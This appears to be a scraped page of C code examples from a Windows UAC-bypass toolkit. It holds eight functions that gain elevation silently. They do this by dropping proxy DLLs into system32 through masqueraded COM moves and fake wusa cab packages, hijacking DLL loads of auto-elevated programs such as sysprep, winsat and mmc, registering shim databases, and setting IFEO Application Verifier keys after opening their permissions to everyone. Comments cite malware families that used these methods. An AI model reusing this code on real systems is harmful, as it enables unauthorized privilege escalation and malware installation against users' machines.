Exemplo n.º 1
0
/*
* ucmRegisterAndRunTarget
*
* Purpose:
*
* Register shim database and execute target app.
*
*/
BOOL ucmRegisterAndRunTarget(
	_In_ LPWSTR lpSystemDirectory,
	_In_ LPWSTR lpSdbinstPath,
	_In_ LPWSTR lpShimDbPath,
	_In_ LPWSTR lpTarget,
	_In_ BOOL IsPatch
	)
{
	BOOL bResult = FALSE;
	WCHAR szTempDirectory[MAX_PATH * 2];
	WCHAR szCmd[MAX_PATH * 4];

	if ((lpTarget == NULL) ||
		(lpSystemDirectory == NULL)  ||
		(lpSdbinstPath == NULL) ||
		(lpShimDbPath == NULL)
		)
	{
		return bResult;
	}

	RtlSecureZeroMemory(szCmd, sizeof(szCmd));
	if (IsPatch) {
		wsprintf(szCmd, L"-p %ws", lpShimDbPath);
	}
	else {
		_strcpy_w(szCmd, lpShimDbPath);
	}

	//register shim, sdbinst.exe
	if (supRunProcess(lpSdbinstPath, szCmd)) {
		RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
		wsprintfW(szTempDirectory, lpTarget, lpSystemDirectory);
		bResult = supRunProcess(szTempDirectory, NULL);

		//remove database
		RtlSecureZeroMemory(szCmd, sizeof(szCmd));
		wsprintf(szCmd, L"/q /u %ws", lpShimDbPath);
		supRunProcess(lpSdbinstPath, szCmd);
		DeleteFileW(lpShimDbPath);
	}
	return bResult;
}
Exemplo n.º 2
0
/*
* ucmStandardAutoElevation2
*
* Purpose:
*
* Bypass UAC by abusing appinfo g_lpAutoApproveEXEList
*
* UAC contain whitelist of trusted fusion processes with only names and no other special restrictions
* Most of them unknown shit and list does not properly handled by system itself, use this fact.
*
*/
BOOL ucmStandardAutoElevation2(
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL  cond = FALSE, bResult = FALSE;
    WCHAR SourceFilePathAndName[MAX_PATH + 1];
    WCHAR DestinationFilePathAndName[MAX_PATH + 1];

    do {

        //source filename of dll
        RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
        _strcpy(SourceFilePathAndName, g_ctx.szTempDirectory);
        _strcat(SourceFilePathAndName, UNBCL_DLL);

        if (!supWriteBufferToFile(SourceFilePathAndName, ProxyDll, ProxyDllSize)) {
            break;
        }

        //copy %temp\unbcl.dll -> system32\unbcl.dll
        if (!ucmMasqueradedMoveFileCOM(SourceFilePathAndName, g_ctx.szSystemDirectory)) {
            break;
        }

        //source filename of process
        RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
        _strcpy(SourceFilePathAndName, g_ctx.szSystemDirectory);
        _strcat(SourceFilePathAndName, SYSPREP_DIR);
        _strcat(SourceFilePathAndName, SYSPREP_EXE);

        RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
        _strcpy(DestinationFilePathAndName, g_ctx.szTempDirectory);
        _strcat(DestinationFilePathAndName, OOBE_EXE);

        //system32\sysprep\sysprep.exe -> temp\oobe.exe
        if (!CopyFile(SourceFilePathAndName, DestinationFilePathAndName, FALSE)) {
            break;
        }

        //temp\oobe.exe -> system32\oobe.exe
        if (!ucmMasqueradedMoveFileCOM(DestinationFilePathAndName, g_ctx.szSystemDirectory)) {
            break;
        }

        RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
        _strcpy(DestinationFilePathAndName, g_ctx.szSystemDirectory);
        _strcat(DestinationFilePathAndName, OOBE_EXE);

        bResult = supRunProcess(DestinationFilePathAndName, NULL);

    } while (cond);

    return bResult;
}
Exemplo n.º 3
0
/*
* ucmWusaExtractPackage
*
* Purpose:
*
* Extract cab to protected directory using wusa.
*
*/
BOOL ucmWusaExtractPackage(
    LPWSTR lpCommandLine
    )
{
    BOOL bResult = FALSE;
    WCHAR szMsuFileName[MAX_PATH * 2];
    WCHAR szCmd[MAX_PATH * 4];

    RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
    _strcpy(szMsuFileName, g_ctx.szTempDirectory);
    _strcat(szMsuFileName, ELLOCNAK_MSU);

    //extract msu data to target directory
    RtlSecureZeroMemory(szCmd, sizeof(szCmd));
    wsprintfW(szCmd, lpCommandLine, szMsuFileName);
    bResult = supRunProcess(L"cmd.exe", szCmd);

    if (szMsuFileName[0] != 0) {
        DeleteFileW(szMsuFileName);
    }
    return bResult;
}
Exemplo n.º 4
0
/*
* ucmAvrfMethod
*
* Purpose:
*
* Acquire elevation through Application Verifier dll injection.
*
*/
BOOL ucmAvrfMethod(
    CONST PVOID AvrfDll,
    DWORD AvrfDllSize
)
{
    BOOL bResult = FALSE, cond = FALSE;
    HKEY hKey = NULL, hSubKey = NULL;
    LRESULT lRet;
    DWORD dwValue = 0x100; // FLG_APPLICATION_VERIFIER;
    WCHAR szCmd[MAX_PATH * 4];

    if (
        (AvrfDll == NULL) ||
        (AvrfDllSize == 0)
    )
    {
        return bResult;
    }

    do {

        //
        // Set new key security dacl
        // Red Alert: manually restore IFEO key permissions after using this tool, as they are not inherited.
        //
        if (!ucmSimdaAlterKeySecurity(T_IFEO, T_SDDL_ALL_FOR_EVERYONE)) {
            OutputDebugString(TEXT("[UCM] Failed to alter key security"));
            break;
        }

        //open IFEO key
        lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"),
                            0, KEY_ALL_ACCESS, &hKey);
        if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) {
            OutputDebugString(TEXT("[UCM] Failed to open IFEO key"));
            break;
        }

        //Set new key and values
        hSubKey = NULL;
        lRet = RegCreateKey(hKey, TEXT("cliconfg.exe"), &hSubKey);
        if ((hSubKey == NULL) || (lRet != ERROR_SUCCESS)) {
            OutputDebugString(TEXT("[UCM] Failed to create IFEO subkey"));
            break;
        }

        lRet = RegSetValueEx(hSubKey, TEXT("GlobalFlag"), 0, REG_DWORD, (BYTE*)&dwValue, sizeof(DWORD));
        if (lRet != ERROR_SUCCESS) {
            OutputDebugString(TEXT("[UCM] Failed to set subkey value 1"));
            break;
        }

        dwValue = (DWORD)_strlen(T_AVRFDLL) * sizeof(TCHAR);
        lRet = RegSetValueEx(hSubKey, TEXT("VerifierDlls"), 0, REG_SZ, (BYTE*)&T_AVRFDLL, dwValue);
        if (lRet != ERROR_SUCCESS) {
            OutputDebugString(TEXT("[UCM] Failed to set subkey value 2"));
            break;
        }

        // Cleanup registry, we don't need anymore.
        RegCloseKey(hSubKey);
        hSubKey = NULL;
        RegCloseKey(hKey);
        hKey = NULL;

        //
        // Extract file to the protected directory
        // First, create cab with fake msu ext, second run fusion process.
        //
        if (!ucmCreateCabinetForSingleFile(T_AVRF_SOURCEDLL, AvrfDll, AvrfDllSize)) {
            break;
        }
        // Drop Hibiki to system32
        if (!ucmWusaExtractPackage(T_AVRF_CMDLINE)) {
            OutputDebugString(TEXT("[UCM] Wusa failed copy Hibiki"));
            break;
        }

        // Finally run target fusion process.
        RtlSecureZeroMemory(szCmd, sizeof(szCmd));
        if (ExpandEnvironmentStringsW(METHOD_SQLSRV_TARGETAPP,
                                      szCmd, MAX_PATH) == 0)
        {
            break;
        }
        bResult = supRunProcess(szCmd, NULL);

    } while (cond);

    if (hKey != NULL) {
        RegCloseKey(hKey);
    }
    if (hSubKey != NULL) {
        RegCloseKey(hSubKey);
    }
    return bResult;
}
Exemplo n.º 5
0
/*
* ucmMMCMethod
*
* Purpose:
*
* Bypass UAC by abusing MMC.exe backdoor hardcoded in appinfo.dll
*
*/
BOOL ucmMMCMethod(
    LPWSTR lpTargetDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize
)
{
    BOOL bResult = FALSE, cond = FALSE;
    WCHAR szSource[MAX_PATH + 1];
    WCHAR szDest[MAX_PATH + 1];
    WCHAR szBuffer[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0) ||
        (lpTargetDll == NULL)
    )
    {
        return bResult;
    }

    if (_strlen_w(lpTargetDll) > 100) {
        return bResult;
    }

    do {

        //put target dll
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, TEMPDIR);
        _strcat_w(szBuffer, lpTargetDll);

        //expand string for proxy dll
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
            break;
        }

        //write proxy dll to disk
        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
            OutputDebugString(TEXT("[UCM] Failed to drop dll"));
            break;
        }
        else {
            OutputDebugStringW(TEXT("[UCM] Dll dropped successfully"));
        }

        //expand string for target dir
        RtlSecureZeroMemory(szDest, sizeof(szDest));
        if (ExpandEnvironmentStringsW(SYSTEMROOTDIR,
                                      szDest, MAX_PATH) == 0)
        {
            break;
        }

        //drop fubuki to system32
        bResult = ucmAutoElevateCopyFile(szSource, szDest);
        if (!bResult) {
            break;
        }

        //run mmc console
        //because of mmc harcoded backdoor uac will autoelevate mmc with valid and trusted MS command
        //event viewer will attempt to load not existing dll, so we will give him our little friend
        bResult = supRunProcess(L"mmc.exe", L"eventvwr.msc");

    } while (cond);

    return bResult;
}
Exemplo n.º 6
0
/*
* ucmWinSATMethod
*
* Purpose:
*
* Acquire elevation through abusing APPINFO.DLL whitelisting model logic and wusa installer/IFileOperation autoelevation.
* Slightly modified target and proxydll can work almost with every autoelevated/whitelisted application.
* This method uses advantage of wusa to write to the protected folders, but can be adapted to IFileOperation too.
* WinSAT used for demonstration purposes only.
*
*/
BOOL ucmWinSATMethod(
    LPWSTR lpTargetDll,
    PVOID ProxyDll,
    DWORD ProxyDllSize,
    BOOL UseWusa
)
{
    BOOL bResult = FALSE, cond = FALSE;
    CABDATA *Cabinet = NULL;
    WCHAR szSource[MAX_PATH + 1];
    WCHAR szDest[MAX_PATH + 1];
    WCHAR szBuffer[MAX_PATH + 1];

    if (
        (ProxyDll == NULL) ||
        (ProxyDllSize == 0) ||
        (lpTargetDll == NULL)
    )
    {
        return bResult;
    }

    if (_strlen_w(lpTargetDll) > 100) {
        return bResult;
    }

    RtlSecureZeroMemory(szSource, sizeof(szSource));
    RtlSecureZeroMemory(szDest, sizeof(szDest));

    do {

        if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\winsat.exe",
                                     szSource, MAX_PATH) == 0)
        {
            break;
        }

        if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe",
                                     szDest, MAX_PATH) == 0)
        {
            break;
        }

        // Copy winsat to temp directory
        if (!CopyFile(szSource, szDest, FALSE)) {
            break;
        }

        //put target dll
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, TEMPDIR);
        _strcat_w(szBuffer, lpTargetDll);


        //expand string for proxy dll
        RtlSecureZeroMemory(szSource, sizeof(szSource));
        if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
            break;
        }

        //write proxy dll to disk
        if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
            OutputDebugString(TEXT("[UCM] Failed to drop dll"));
            break;
        }
        else {
            OutputDebugStringW(TEXT("[UCM] Dll dropped successfully"));
        }

        //
        // Two options: use wusa installer or IFileOperation
        //
        if ( UseWusa ) {

            //build cabinet
            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
                                          szBuffer, MAX_PATH) == 0)
            {
                break;
            }

            Cabinet = cabCreate(szBuffer);
            if (Cabinet) {

                //expand string for winsat.exe
                if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe",
                                             szDest, MAX_PATH) == 0)
                {
                    break;
                }

                //put proxy dll inside cabinet
                cabAddFile(Cabinet, szSource, lpTargetDll);

                //put winsat.exe
                cabAddFile(Cabinet, szDest, L"winsat.exe");
                cabClose(Cabinet);
                Cabinet = NULL;
            }
            else {
                OutputDebugString(TEXT("[UCM] Error creating cab archive"));
                break;
            }

            //extract package
            ucmWusaExtractPackage(T_WINSAT_CMDLINE);

            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0)	{
                break;
            }
            bResult = supRunProcess(szBuffer, NULL);
        }
        else {

            //wusa extract banned, switch to IFileOperation.
            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStringsW(M1W7_TARGETDIR,
                                          szBuffer, MAX_PATH) == 0)
            {
                break;
            }
            bResult = ucmAutoElevateCopyFile(szSource, szBuffer);
            if (!bResult) {
                break;
            }
            bResult = ucmAutoElevateCopyFile(szDest, szBuffer);
            if (!bResult) {
                break;
            }

            Sleep(0);

            //run winsat
            RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
            if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0)	{
                break;
            }
            bResult = supRunProcess(szBuffer, NULL);
            //cleanup of the above files must be done by payload code
        }

    } while (cond);

    if (Cabinet) {
        cabClose(Cabinet);
    }
    //remove trash from %temp%
    if (szDest[0] != 0) {
        DeleteFileW(szDest);
    }
    if (szSource[0] != 0) {
        DeleteFileW(szSource);
    }

    return bResult;
}
Exemplo n.º 7
0
/*
* ucmStandardAutoElevation
*
* Purpose:
*
* Leo Davidson AutoElevation method with derivatives.
*
* UacMethodSysprep1   - Original Leo Davidson concept.
* UacMethodSysprep2   - Windows 8.1 adapted UacMethodSysprep1 (bypassing sysprep embedded manifest dlls redirection).
* UacMethodTilon      - Leo Davidson concept with different target dll, used by Win32/Tilon.
* UacMethodSysprep3   - Windows 10 TH1 adapted UacMethodSysprep1.
* UacMethodOobe       - WinNT/Pitou derivative from Leo Davidson concept.
*
*/
BOOL ucmStandardAutoElevation(
    UACBYPASSMETHOD Method,
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL	cond = FALSE, bResult = FALSE;
    WCHAR   szSourceDll[MAX_PATH * 2];
    WCHAR   szTargetDir[MAX_PATH * 2];
    WCHAR   szTargetProcess[MAX_PATH * 2];


    _strcpy(szSourceDll, g_ctx.szTempDirectory);
    _strcpy(szTargetDir, g_ctx.szSystemDirectory);
    _strcpy(szTargetProcess, g_ctx.szSystemDirectory);

    switch (Method) {

    case UacMethodSysprep1:

        //%temp%\cryptbase.dll
        _strcat(szSourceDll, CRYPTBASE_DLL);

        //%systemroot%\system32\sysprep      
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe    
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodSysprep2:

        //%temp\\shcore.dll
        _strcat(szSourceDll, SHCORE_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodSysprep3:

        //%temp%\dbgcore.dll
        _strcat(szSourceDll, DBGCORE_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    case UacMethodOobe:

        //%temp%\wdscore.dll
        _strcat(szSourceDll, WDSCORE_DLL);

        //%systemroot%\system32\oobe\"
        _strcat(szTargetDir, L"oobe\\");

        //%systemroot%\system32\oobe\setupsqm.exe
        _strcat(szTargetProcess, SETUPSQM_EXE);

        break;

    case UacMethodTilon:

        //%temp%\ActionQueue.dll
        _strcat(szSourceDll, ACTIONQUEUE_DLL);

        //%systemroot%\system32\sysprep
        _strcat(szTargetDir, SYSPREP_DIR);

        //%systemroot%\system32\sysprep\sysprep.exe
        _strcat(szTargetProcess, SYSPREP_DIR);
        _strcat(szTargetProcess, SYSPREP_EXE);

        break;

    default:
        return FALSE;
    }

    do {

        if (!supWriteBufferToFile(szSourceDll, ProxyDll, ProxyDllSize))
            break;

        if (!ucmMasqueradedMoveFileCOM(szSourceDll, szTargetDir))
            break;

        bResult = supRunProcess(szTargetProcess, NULL);

    } while (cond);

    return bResult;
}
Exemplo n.º 8
0
/*
* ucmWusaMethod
*
* Purpose:
*
* Build and install fake msu package then run target application.
*
*/
BOOL ucmWusaMethod(
    UACBYPASSMETHOD Method,
    PVOID ProxyDll,
    DWORD ProxyDllSize
    )
{
    BOOL   bResult = FALSE, cond = FALSE;
    LPWSTR lpCommandLine;
    WCHAR  szSourceDll[MAX_PATH * 2];
    WCHAR  szTargetProcess[MAX_PATH * 2];

    if ((ProxyDll == NULL) || (ProxyDllSize == 0)) {
        return FALSE;
    }

    _strcpy(szTargetProcess, g_ctx.szSystemDirectory);
    _strcpy(szSourceDll, g_ctx.szTempDirectory);

    switch (Method) {

        //use migwiz.exe as target
    case UacMethodCarberp1:
        _strcat(szSourceDll, WDSCORE_DLL);
        lpCommandLine = CMD_EXTRACT_MIGWIZ;
        _strcat(szTargetProcess, MIGWIZ_DIR);
        _strcat(szTargetProcess, MIGWIZ_EXE);
        break;

        //use cliconfg.exe as target
    case UacMethodCarberp2:
        _strcat(szSourceDll, NTWDBLIB_DLL);
        lpCommandLine = CMD_EXTRACT_SYSTEM32;
        _strcat(szTargetProcess, CLICONFG_EXE);
        break;

    default:
        return FALSE;
    }

    if (!PathFileExists(szTargetProcess)) {
        supDebugPrint(TEXT("ucmWusaMethod"), ERROR_FILE_NOT_FOUND);
        return FALSE;
    }

    do {

        //
        // Extract file to the protected directory
        // First, create cab with fake msu ext, second run fusion process.
        //
        if (!ucmCreateCabinetForSingleFile(szSourceDll, ProxyDll, ProxyDllSize)) {
            break;
        }

        if (!ucmWusaExtractPackage(lpCommandLine)) {
            break;
        }

        //run target process for dll hijacking
        bResult = supRunProcess(szTargetProcess, NULL);

    } while (cond);


    return bResult;
}